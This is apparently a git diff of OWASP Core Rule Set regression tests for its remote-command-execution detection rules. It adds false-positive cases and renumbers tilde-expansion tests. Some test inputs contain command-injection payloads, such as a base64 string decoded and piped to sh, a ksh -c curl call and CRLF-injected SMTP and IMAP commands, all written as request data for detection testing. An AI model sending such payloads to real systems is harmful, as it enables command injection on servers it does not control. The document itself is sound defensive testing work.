+    desc: |
+      False positive with token in referrer.
+      Should not match `df`.
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+            referer: https://www.example.com/xyz/?abc=dfc987c2-72e2-4a8e-ad98-e0bf1bc3a01c
+          method: POST
+          port: 80
+          uri: "/post"
+          version: HTTP/1.1
+        output:
+          log:
+            no_expect_ids: [932239]
+  - test_id: 57
+    desc: |
+      False positive with Pashto Afghanistan User-Agent
+      Should not match `ps` in `ps-af`.
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Host: localhost
+            User-Agent: "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_10_1 rv:5.0; ps-AF) AppleWebKit/534.28.2 (KHTML, like Gecko) Version/4.0 Safari/534.28.2"
+          method: POST
+          port: 80
+          uri: "/post"
+          version: HTTP/1.1
+        output:
+          log:
+            no_expect_ids: [932239]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932240.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932240.yaml
index bef2ffde4..6d0d73d16 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932240.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932240.yaml
@@ -163,7 +163,7 @@ tests:
           port: 80
           # "cmd=python3.10 cmd"
           uri: '/get?cmd=""p""y""t""h""o""n""3"".""1""0""%20""c""m""d""'
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932240]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml
index 8cbb89e80..72d55e87a 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932250.yaml
@@ -4,7 +4,7 @@ meta:
   description: |
     Tests to trigger or not trigger rule 932250.
     - commands used must be less than 4 chars
-    - [\s<>&|)] is required after a command to reduce FPs
+    - Invalid command matches (i.e sudoaaaa) aren't allowed to prevent false positives
 rule_id: 932250
 tests:
   - test_id: 1
@@ -57,7 +57,7 @@ tests:
           log:
             no_expect_ids: [932250]
   - test_id: 4
-    desc: Negative test for excluded command `c99`
+    desc: "Positive test: c99 command"
     stages:
       - input:
           dest_addr: "127.0.0.1"
@@ -72,7 +72,7 @@ tests:
           version: "HTTP/1.1"
         output:
           log:
-            no_expect_ids: [932250]
+            expect_ids: [932250]
   - test_id: 5
     desc: "Positive test: Unix Command Injection - ksh test"
     stages:
@@ -86,7 +86,7 @@ tests:
           port: 80
           # code=ksh -c "curl google."COM
           uri: "/get?code=ksh%20-c%20\"curl%20google.\"COM"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932250]
@@ -220,3 +220,19 @@ tests:
         output:
           log:
             no_expect_ids: [932250]
+  - test_id: 14
+    desc: "FP for 'rc'"
+    stages:
+      - input:
+          dest_addr: "127.0.0.1"
+          method: "GET"
+          port: 80
+          headers:
+            User-Agent: "OWASP CRS test agent"
+            Host: "localhost"
+            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          uri: "/get?param=rc"
+          version: "HTTP/1.1"
+        output:
+          log:
+            no_expect_ids: [932250]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml
index d9e377534..e5f68cdb8 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932260.yaml
@@ -111,7 +111,7 @@ tests:
           port: 80
           # "cmd=python cmd"
           uri: "/get?cmd=python3.10%20cmd"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932260]
@@ -128,7 +128,7 @@ tests:
           port: 80
           # "cmd=printf dW5hbWUgLWE=|base64 -d|sh"
           uri: "/get?cmd=printf%20dW5hbWUgLWE=%7Cbase64%20-d%7Csh"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932260]
@@ -382,7 +382,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?args=comment"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932260]
@@ -398,7 +398,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?last_name=Perlak"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932260]
@@ -414,7 +414,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?first_name=Axel"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932260]
@@ -430,7 +430,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?args=performance"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932260]
@@ -482,7 +482,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?last_name=Cronk"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932260]
@@ -498,7 +498,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=ansible all -m ping
         output:
@@ -516,7 +516,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=ansible-config dump
         output:
@@ -534,7 +534,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=ansible-galaxy collection install community.general
         output:
@@ -552,7 +552,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=ansible-console
         output:
@@ -570,7 +570,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=ansible-doc plugin ping
         output:
@@ -588,7 +588,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=ansible-inventory --list
         output:
@@ -606,7 +606,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=ansible-pull --url example.com
         output:
@@ -624,7 +624,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=ansible-vault decrypt secret
         output:
@@ -642,7 +642,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=ansible-playbook site.yml
         output:
@@ -660,7 +660,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=chef-vault -i secret
         output:
@@ -678,7 +678,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=chef-shell
         output:
@@ -696,7 +696,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=chef-run all recipie.rb
         output:
@@ -714,7 +714,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=chef-client -t 1.1.1.1
         output:
@@ -732,7 +732,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=visudo
         output:
@@ -750,7 +750,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
           data: |
             code=cscli alerts list
         output:
@@ -774,3 +774,54 @@ tests:
         output:
           log:
             no_expect_ids: [932260]
+  - test_id: 46
+    desc: "False positive with session cookie"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+            cookie: fpestid=SUDoLongRandomString
+          method: POST
+          port: 80
+          uri: /post
+          version: HTTP/1.1
+        output:
+          log:
+            no_expect_ids: [932260]
+  - test_id: 47
+    desc: "False Positive: matching pipe `self`"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+            Host: localhost
+            User-Agent: "OWASP CRS test agent"
+          method: POST
+          port: 80
+          uri: "/post"
+          version: HTTP/1.1
+          data: |
+            code=Compra a MODULAR ALUMINIO ESTRUCTURAL, STRUT PROFILE PG30 30X30 4 SLOTS | SELF TAPPING SCREW PG30 M1
+        output:
+          log:
+            no_expect_ids: [932260]
+  - test_id: 48
+    desc: "False Positive: matching `sendmail`"
+    stages:
+      - input:
+          dest_addr: 127.0.0.1
+          headers:
+            User-Agent: "OWASP CRS test agent"
+            Host: localhost
+            Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+          method: GET
+          port: 80
+          uri: "/get?r=queue%2Fsendmails"
+          version: HTTP/1.1
+        output:
+          log:
+            no_expect_ids: [932260]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932270.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932270.yaml
index e29dc8d10..869bf0e46 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932270.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932270.yaml
@@ -36,7 +36,7 @@ tests:
           log:
             expect_ids: [932270]
   - test_id: 3
-    desc: "Bash Tilde Expansion - ~0"
+    desc: "Bash Tilde Expansion - ~-1"
     stages:
       - input:
           dest_addr: "127.0.0.1"
@@ -46,13 +46,13 @@ tests:
             User-Agent: "OWASP CRS test agent"
             Host: "localhost"
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-          uri: "/get?932270-3=%7E0"
+          uri: "/get?932270-3=%7E%2D1"
           version: "HTTP/1.1"
         output:
           log:
             expect_ids: [932270]
   - test_id: 4
-    desc: "Bash Tilde Expansion - ~-1"
+    desc: "Bash Tilde expansion - ~+5"
     stages:
       - input:
           dest_addr: "127.0.0.1"
@@ -62,13 +62,13 @@ tests:
             User-Agent: "OWASP CRS test agent"
             Host: "localhost"
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-          uri: "/get?932270-4=%7E%2D1"
+          uri: "/get?932270-4=%7E%2B5"
           version: "HTTP/1.1"
         output:
           log:
             expect_ids: [932270]
   - test_id: 5
-    desc: "Bash Tilde expansion - ~+5"
+    desc: "Bash Tilde expansion - ~+z"
     stages:
       - input:
           dest_addr: "127.0.0.1"
@@ -78,13 +78,13 @@ tests:
             User-Agent: "OWASP CRS test agent"
             Host: "localhost"
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-          uri: "/get?932270-5=%7E%2B5"
+          uri: "/get?932270-5=%7E%2Bz"
           version: "HTTP/1.1"
         output:
           log:
-            expect_ids: [932270]
+            no_expect_ids: [932270]
   - test_id: 6
-    desc: "Bash Tilde expansion(Negative test) - ~+z"
+    desc: "Bash Tilde expansion - ~-z"
     stages:
       - input:
           dest_addr: "127.0.0.1"
@@ -100,22 +100,6 @@ tests:
           log:
             no_expect_ids: [932270]
   - test_id: 7
-    desc: "Bash Tilde expansion(Negative test) - ~-z"
-    stages:
-      - input:
-          dest_addr: "127.0.0.1"
-          method: "GET"
-          port: 80
-          headers:
-            User-Agent: "OWASP CRS test agent"
-            Host: "localhost"
-            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-          uri: "/get?932270-7=%7E%2Bz"
-          version: "HTTP/1.1"
-        output:
-          log:
-            no_expect_ids: [932270]
-  - test_id: 8
     desc: "Bash Tilde expansion(Negative test) - ~z"
     stages:
       - input:
@@ -126,12 +110,12 @@ tests:
             User-Agent: "OWASP CRS test agent"
             Host: "localhost"
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-          uri: "/get?932270-8=%7Ez"
+          uri: "/get?932270-7=%7Ez"
           version: "HTTP/1.1"
         output:
           log:
             no_expect_ids: [932270]
-  - test_id: 9
+  - test_id: 8
     desc: "Bash Tilde expansion - ~+"
     stages:
       - input:
@@ -143,12 +127,12 @@ tests:
             Host: "localhost"
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
           uri: "/post"
-          data: 932270-9=%7E%2B
+          data: 932270-8=%7E%2B
           version: "HTTP/1.1"
         output:
           log:
             expect_ids: [932270]
-  - test_id: 10
+  - test_id: 9
     desc: "Bash Tilde Expansion - ~-"
     stages:
       - input:
@@ -160,29 +144,12 @@ tests:
             Host: "localhost"
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
           uri: "/post"
-          data: 932270-10=%7E%2D
-          version: "HTTP/1.1"
-        output:
-          log:
-            expect_ids: [932270]
-  - test_id: 11
-    desc: "Bash Tilde Expansion - ~0"
-    stages:
-      - input:
-          dest_addr: "127.0.0.1"
-          method: "POST"
-          port: 80
-          headers:
-            User-Agent: "OWASP CRS test agent"
-            Host: "localhost"
-            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-          uri: "/post"
-          data: 932270-11=%7E0
+          data: 932270-9=%7E%2D
           version: "HTTP/1.1"
         output:
           log:
             expect_ids: [932270]
-  - test_id: 12
+  - test_id: 10
     desc: "Bash Tilde Expansion - ~-1"
     stages:
       - input:
@@ -194,13 +161,13 @@ tests:
             Host: "localhost"
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
           uri: "/post"
-          data: 932270-12=%7E%2D1
+          data: 932270-10=%7E%2D1
           version: "HTTP/1.1"
         output:
           log:
             expect_ids: [932270]
-  - test_id: 13
-    desc: "Bash Tilde expansion - ~+5"
+  - test_id: 11
+    desc: "Bash Tilde expansion - ~-z"
     stages:
       - input:
           dest_addr: "127.0.0.1"
@@ -211,13 +178,13 @@ tests:
             Host: "localhost"
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
           uri: "/post"
-          data: 932270-13=%7E%2B5
+          data: 932270-13=%7E%2Bz
           version: "HTTP/1.1"
         output:
           log:
-            expect_ids: [932270]
-  - test_id: 14
-    desc: "Bash Tilde expansion(Negative test) - ~+z"
+            no_expect_ids: [932270]
+  - test_id: 12
+    desc: "Bash Tilde expansion - ~z"
     stages:
       - input:
           dest_addr: "127.0.0.1"
@@ -228,30 +195,29 @@ tests:
             Host: "localhost"
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
           uri: "/post"
-          data: 932270-14=%7E%2Bz
+          data: 932270-14=%7Ez
           version: "HTTP/1.1"
         output:
           log:
             no_expect_ids: [932270]
-  - test_id: 15
-    desc: "Bash Tilde expansion(Negative test) - ~-z"
+  - test_id: 13
+    desc: "Bash Tilde Expansion - ~0"
     stages:
       - input:
           dest_addr: "127.0.0.1"
-          method: "POST"
+          method: "GET"
           port: 80
           headers:
             User-Agent: "OWASP CRS test agent"
             Host: "localhost"
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-          uri: "/post"
-          data: 932270-15=%7E%2Bz
+          uri: "/get?932271-13=%7E0"
           version: "HTTP/1.1"
         output:
           log:
             no_expect_ids: [932270]
-  - test_id: 16
-    desc: "Bash Tilde expansion(Negative test) - ~z"
+  - test_id: 14
+    desc: "Bash Tilde Expansion - ~0"
     stages:
       - input:
           dest_addr: "127.0.0.1"
@@ -262,7 +228,7 @@ tests:
             Host: "localhost"
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
           uri: "/post"
-          data: 932270-16=%7Ez
+          data: 932271-14=%7E0
           version: "HTTP/1.1"
         output:
           log:
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932271.yaml
similarity index 51%
rename from tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml
rename to tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932271.yaml
index 4f321727b..6f7a3d021 100644
--- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932271.yaml
@@ -1,128 +1,103 @@
 ---
 meta:
-  author: "csanders-git, Max Leske, azurit"
-  description: "Detect invalid URI encoding in the request URI"
-rule_id: 920220
+author: "Xhoenix"
+rule_id: 932271
 tests:
   - test_id: 1
-    desc: Detect invalid URI encoding in decoded URI (`%w20`)
+    desc: "Bash Tilde Expansion - ~0"
     stages:
       - input:
           dest_addr: "127.0.0.1"
+          method: "GET"
           port: 80
-          uri: "/get?x=%25w20"
           headers:
             User-Agent: "OWASP CRS test agent"
             Host: "localhost"
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          uri: "/get?932271-1=%7E0"
           version: "HTTP/1.1"
         output:
           log:
-            expect_ids: [920220]
+            expect_ids: [932271]
   - test_id: 2
-    desc: Detect invalid URI encoding in decoded URI (`%1G`)
+    desc: "Bash Tilde Expansion - ~0"
     stages:
       - input:
           dest_addr: "127.0.0.1"
+          method: "POST"
           port: 80
-          uri: "/get?x=%251G"
           headers:
             User-Agent: "OWASP CRS test agent"
             Host: "localhost"
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          uri: "/post"
+          data: 932271-2=%7E0
           version: "HTTP/1.1"
         output:
           log:
-            expect_ids: [920220]
+            expect_ids: [932271]
   - test_id: 3
-    desc: Do not trigger for valid URI encoding in decoded URI (`xyz zyx`)
+    desc: "Bash Tilde expansion(Negative test) - ~+z"
     stages:
       - input:
           dest_addr: "127.0.0.1"
+          method: "POST"
           port: 80
-          uri: "get/?x=xyz%20zyx"
           headers:
             User-Agent: "OWASP CRS test agent"
             Host: "localhost"
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          uri: "/post"
+          data: 932271-3=%7E%2Bz
           version: "HTTP/1.1"
         output:
           log:
-            no_expect_ids: [920220]
+            no_expect_ids: [932271]
   - test_id: 4
-    desc: Do not trigger for spaces encoded as `+`, which is valid
+    desc: "Bash Tilde expansion(Negative test) - ~+z"
     stages:
       - input:
           dest_addr: "127.0.0.1"
+          method: "GET"
           port: 80
-          uri: "/get?test=This+is+a+test"
           headers:
             User-Agent: "OWASP CRS test agent"
             Host: "localhost"
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          uri: "/get?932271-3=%7E%2Bz"
           version: "HTTP/1.1"
         output:
           log:
-            no_expect_ids: [920220]
+            no_expect_ids: [932271]
   - test_id: 5
-    desc: |
-      Detect incomplete URI encoding sequence (`bxy`, with crippled encoding of `b`).
-      Note that the second character must not complete the `%6` to a valid sequence.
+    desc: "Bash Tilde expansion - ~+"
     stages:
       - input:
           dest_addr: "127.0.0.1"
+          method: "GET"
           port: 80
-          uri: "/get?parm=%6%78%79"
           headers:
             User-Agent: "OWASP CRS test agent"
             Host: "localhost"
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          uri: "/get?932270-1=%7E%2B"
           version: "HTTP/1.1"
         output:
           log:
-            expect_ids: [920220]
+            no_expect_ids: [932271]
   - test_id: 6
-    desc: Detect incomplete URI encoding sequence, single `%` (`bad%`)
+    desc: "Bash Tilde Expansion - ~-"
     stages:
       - input:
           dest_addr: "127.0.0.1"
+          method: "GET"
           port: 80
-          uri: "/get?parm=%62%61%64%"
           headers:
             User-Agent: "OWASP CRS test agent"
             Host: "localhost"
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+          uri: "/get?932270-2=%7E%2D"
           version: "HTTP/1.1"
         output:
           log:
-            expect_ids: [920220]
-  - test_id: 7
-    desc: Do not inspect file names for invalid URI encoding (`Taxes20%Done.txt`)
-    stages:
-      - input:
-          dest_addr: "127.0.0.1"
-          port: 80
-          uri: "/get/Taxes20%25Done.txt"
-          headers:
-            User-Agent: "OWASP CRS test agent"
-            Host: "localhost"
-            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-          version: "HTTP/1.1"
-        output:
-          log:
-            no_expect_ids: [920220]
-  - test_id: 8
-    desc: Do not inspect file names for invalid URI encoding (`Taxes20%Done.txt`), with query
-    stages:
-      - input:
-          dest_addr: "127.0.0.1"
-          port: 80
-          uri: "/get/Taxes20%25Done.txt?x%20y"
-          headers:
-            User-Agent: "OWASP CRS test agent"
-            Host: "localhost"
-            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-          version: "HTTP/1.1"
-        output:
-          log:
-            no_expect_ids: [920220]
+            no_expect_ids: [932271]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932300.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932300.yaml
index 129d4aeae..376f4136b 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932300.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932300.yaml
@@ -16,7 +16,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?attackme=%0d%0aMAIL%20FROM%3A%3Ca%40b.com%3E"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932300]
@@ -32,7 +32,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?text=We%20received%20this%20mail%20from%20Mars"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932300]
@@ -50,7 +50,7 @@ tests:
           uri: "/post"
           data: |
             textarea=Hello%21%20We%20finally%20received%20this%20mail%20from%3A%3Ctest%40coreruleset.org%3E%2C%20which%20means%20that%20we%20can%20do%20this%20finally.
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932300]
@@ -66,7 +66,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?attackme=%0d%0aEHLO%20test.com"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932300]
@@ -84,7 +84,7 @@ tests:
           uri: "/post"
           data: |
             textarea=Hello%21%20This%20text%20introduces%20a%20typo%20when%20saying%20%22hello%22%20so%20we%20say%20ehlo%3A%20coreruleset.org%20to%20all%21
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932300]
@@ -100,7 +100,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?attackme=%0d%0aRCPT%20TO%3A%3CPostmaster%3E"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932300]
@@ -118,7 +118,7 @@ tests:
           uri: "/post"
           data: |
             textarea=Hello%21%20This%20text%20introduces%20a%20typo%20when%20saying%20%22receipt%20to%22%20so%20we%20say%20rcpt%20to%3A%20%3Ccoreruleset.org%3E
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932300]
@@ -134,7 +134,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?attackme=%0d%0aRCPT%20TO%3A%3CPostmaster%3E"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932300]
@@ -152,7 +152,7 @@ tests:
           uri: "/post"
           data: |
             textarea=S%3A%20220%20foo.com%20Simple%20Mail%20Transfer%20Service%20Ready%0AC%3A%20EHLO%20bar.com%0AS%3A%20250-foo.com%20greets%20bar.com%0AS%3A%20250-8BITMIME%0AS%3A%20250-SIZE%0AS%3A%20250-DSN%0AS%3A%20250%20HELP%0AC%3A%20MAIL%20FROM%3A%3CSmith%40bar.com%3E%0AS%3A%20250%20OK%0AC%3A%20RCPT%20TO%3A%3CJones%40foo.com%3E%0AS%3A%20250%20OK%0AC%3A%20RCPT%20TO%3A%3CGreen%40foo.com%3E%0AS%3A%20550%20No%20such%20user%20here%0AC%3A%20RCPT%20TO%3A%3CBrown%40foo.com%3E%0AS%3A%20250%20OK%0AC%3A%20DATA%0AS%3A%20354%20Start%20mail%20input%3B%20end%20with%20%3CCRLF%3E.%3CCRLF%3E%0AC%3A%20Blah%20blah%20blah...%0AC%3A%20...etc.%20etc.%20etc.%0AC%3A%20.%0AS%3A%20250%20OK%0AC%3A%20QUIT%0AS%3A%20221%20foo.com%20Service%20closing%20transmission%20channel
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932300]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932301.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932301.yaml
index ba80b3424..ac9c12edf 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932301.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932301.yaml
@@ -16,7 +16,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?test=%0d%0aDATA"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932301]
@@ -32,7 +32,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?text=We%20need%20that%20data%20now"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932301]
@@ -50,7 +50,7 @@ tests:
           uri: "/post"
           data: |
             textarea=Hello%21%20World.%0adata%20not%20found.
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932301]
@@ -66,7 +66,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?attackme=%0d%0aQUIT"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932301]
@@ -84,7 +84,7 @@ tests:
           uri: "/post"
           data: |
             textarea=Hey%20please%20do%20not%20quit
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932301]
@@ -100,7 +100,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?attackme=%0d%0aHELP%20Postmaster"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932301]
@@ -118,7 +118,7 @@ tests:
           uri: "/post"
           data: |
             textarea=Hello%21%20This%20text%20needs%20help%20now
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932301]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932310.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932310.yaml
index 12a1676a0..376d1ffcb 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932310.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932310.yaml
@@ -18,7 +18,7 @@ tests:
           uri: "/post"
           data: |
             textarea=%0D%0AA003%20APPEND%20saved-messages%20(%5CSeen)%20%7B310%7D%0D%0A%20Date%3A%20Mon%2C%207%20Feb%201994%2021%3A52%3A25%20-0800%20(PST)%0D%0A%20From%3A%20Test%20CRS%20%3Ctest%40coreruleset.org%3E%0D%0A%20Subject%3A%20Appending%0D%0A%20To%3A%20test%40coreruleset.org%0D%0A%20Message-Id%3A%20%3CB27397-0100000%40coreruleset.org%3E%0D%0A%20MIME-Version%3A%201.0%0D%0A%20Content-Type%3A%20TEXT%2FPLAIN%3B%20CHARSET%3DUS-ASCII%0D%0A%20%0D%0A%20Hello%20World%2C%20can%20I%20append%3F
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [932310]
@@ -34,7 +34,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?text=I%20wanted%20to%20append%20something%20%28annoying%29%20%7Bclosed%7D"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [932310]
@@ -52,7 +52,7 @@ tests:
           uri: "/post"
           data: |
             textarea=%0D%0Aa001%20authenticate%20PLAIN%0D%0A
